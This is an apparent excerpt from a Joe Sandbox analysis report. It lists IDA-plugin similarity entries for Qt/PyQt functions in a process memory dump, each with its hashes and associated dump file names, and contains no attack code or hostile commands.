                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?resetAbstractData@InternalItemModel@@
                                                                                                                                                                                                                • String ID: BJ8$QRegExpValidator$timerEvent$timerEvent(self, a0: Optional[QTimerEvent])
                                                                                                                                                                                                                • API String ID: 59943102-1879435982
                                                                                                                                                                                                                • Opcode ID: 4a20e25831b94bad09f215b82177781bf4d2f9800ddbdc99108dcf6a951cd103
                                                                                                                                                                                                                • Instruction ID: a8ed3783a9f1c311c392fb94768974beeda831528577a6536610b1189fc043d6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4a20e25831b94bad09f215b82177781bf4d2f9800ddbdc99108dcf6a951cd103
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F0217FB2A0DB46C6EB608B39E88426A77A8FB85B84F145176DE8D53774DF3CD049C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?read@DataItem@@StandardStream@@@
                                                                                                                                                                                                                • String ID: BJ9$QStandardItem$read$read(self, in_: QDataStream)
                                                                                                                                                                                                                • API String ID: 1850864242-2601312664
                                                                                                                                                                                                                • Opcode ID: eaa0532b5bdcff153250518c35738f2fe41fc71fd1de8b8066c00dcf76caa06b
                                                                                                                                                                                                                • Instruction ID: 8cbdf5321461646a9ec6aa62749350fdbf5bdd7f15f67cff0d0253fd9b11f42f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: eaa0532b5bdcff153250518c35738f2fe41fc71fd1de8b8066c00dcf76caa06b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5A213BB2A0CB4682EB608F25E88426A77A8FF95B94F144176DA8D03B74DF3CE555CB00
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?resetAbstractData@InternalItemModel@@
                                                                                                                                                                                                                • String ID: BJ8$QStandardItemModel$childEvent$childEvent(self, a0: Optional[QChildEvent])
                                                                                                                                                                                                                • API String ID: 59943102-3049280183
                                                                                                                                                                                                                • Opcode ID: a735deb8fa06ed8050697a9f5424275e74ab8adf0c5676d0cfc69e385323ebf9
                                                                                                                                                                                                                • Instruction ID: bec79f6e80a98b573d892b94a55b898d4612f6ff2063f43cdcb16c649deda4e5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a735deb8fa06ed8050697a9f5424275e74ab8adf0c5676d0cfc69e385323ebf9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F0216BB2A0DF46C1EB609B25E8842AA77A8FB85B84F545172DA8D07734EF3CE049D700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ?setClipPath@QPainter@@QEAAXAEBVQPainterPath@@W4ClipOperation@Qt@@@Z.QT5GUI ref: 00007FFB9A3379CD
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Clip$?setOperation@PainterPainter@@Path@Path@@Qt@@@
                                                                                                                                                                                                                • String ID: BJ9|E$QPainter$setClipPath$setClipPath(self, path: QPainterPath, operation: Qt.ClipOperation = Qt.ReplaceClip)
                                                                                                                                                                                                                • API String ID: 2717043895-730294478
                                                                                                                                                                                                                • Opcode ID: a0b77e5c3b8c17727ccb5d1e335821749a1632db6fd87bca2d9f66d14a218500
                                                                                                                                                                                                                • Instruction ID: fcb32bd64788d477a85107a46f9a151d27d6c658adc83409ba79e16bf7676023
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a0b77e5c3b8c17727ccb5d1e335821749a1632db6fd87bca2d9f66d14a218500
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9321D2B6A18B56C5EB60CF25E8883A933A8FB49790F91417ACA9D43320DF39D959C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?setItem@@StandardString@@@Text@
                                                                                                                                                                                                                • String ID: BJ1$QStandardItem$setText$setText(self, atext: Optional[str])
                                                                                                                                                                                                                • API String ID: 3857957717-3918002662
                                                                                                                                                                                                                • Opcode ID: 25cb5fb356fe69998119311fdcfd1ab0e55153cd7eba0c449d981bb64fa33805
                                                                                                                                                                                                                • Instruction ID: 35cec2330dcb6ed3573be062aa8b85064e99ba9235ab1e8b09a481cb0a771112
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 25cb5fb356fe69998119311fdcfd1ab0e55153cd7eba0c449d981bb64fa33805
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8921E8B6B08F56C1EB609F65E8881A933A8FB48B94F9180B6CE5D43720DF3DE549C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?setPainter@@Transform@Transform@@_
                                                                                                                                                                                                                • String ID: BJ9|b$QPainter$setTransform$setTransform(self, transform: QTransform, combine: bool = False)
                                                                                                                                                                                                                • API String ID: 2953993439-4023963478
                                                                                                                                                                                                                • Opcode ID: 4aeddda5b54f188656e3daeefffd09b829c4a8759e06c9daa45ac8ab07897aec
                                                                                                                                                                                                                • Instruction ID: fe1068a98db728ce0ff17a62eef537def5fe5b3f4c2f45d9899ffb25306018fe
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4aeddda5b54f188656e3daeefffd09b829c4a8759e06c9daa45ac8ab07897aec
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB2104B6B18F5685EB218F25E8882AD33B8FB48780F914176CAAD43720DF39D959C700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?setF@@@Layout@@PointPosition@Text
                                                                                                                                                                                                                • String ID: BJ1$QTextLayout$setPosition$setPosition(self, p: Union[QPointF, QPoint])
                                                                                                                                                                                                                • API String ID: 321525979-1473786946
                                                                                                                                                                                                                • Opcode ID: a9db7711a7e8488f5321a71bccf9c4f1ebb888fabe64a16846c4869fd8119c04
                                                                                                                                                                                                                • Instruction ID: b83410348737ce07ef4b2bad6d009ce868632eeade3ec8d27ecf63a9810c54cd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a9db7711a7e8488f5321a71bccf9c4f1ebb888fabe64a16846c4869fd8119c04
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D221E9B6B18F5681EB609F65E8881A933B8FB48B84F918176CE5D43320DF7DD549C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?setDocument@@Html@String@@@Text
                                                                                                                                                                                                                • String ID: BJ1$QTextDocument$setHtml$setHtml(self, html: Optional[str])
                                                                                                                                                                                                                • API String ID: 2191005602-266250314
                                                                                                                                                                                                                • Opcode ID: 2ebaaa27506286db65048bd1831073e41d0395f6069dca5d51276584e626dde5
                                                                                                                                                                                                                • Instruction ID: b5cc48c745b6e6c8c3b6325b364b3679bc9642db68f2065e3cb69b14ce1a30e6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2ebaaa27506286db65048bd1831073e41d0395f6069dca5d51276584e626dde5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C021E7B6B08F56C1EB609F25E8881A933A8FB49B84F9181B6CE9D43320DF7DD559C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ?setDiscardCommand@QSessionManager@@QEAAXAEBVQStringList@@@Z.QT5GUI ref: 00007FFB9A303920
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?setCommand@DiscardList@@@Manager@@SessionString
                                                                                                                                                                                                                • String ID: BJ1$QSessionManager$setDiscardCommand$setDiscardCommand(self, a0: Iterable[Optional[str]])
                                                                                                                                                                                                                • API String ID: 709668538-2485378439
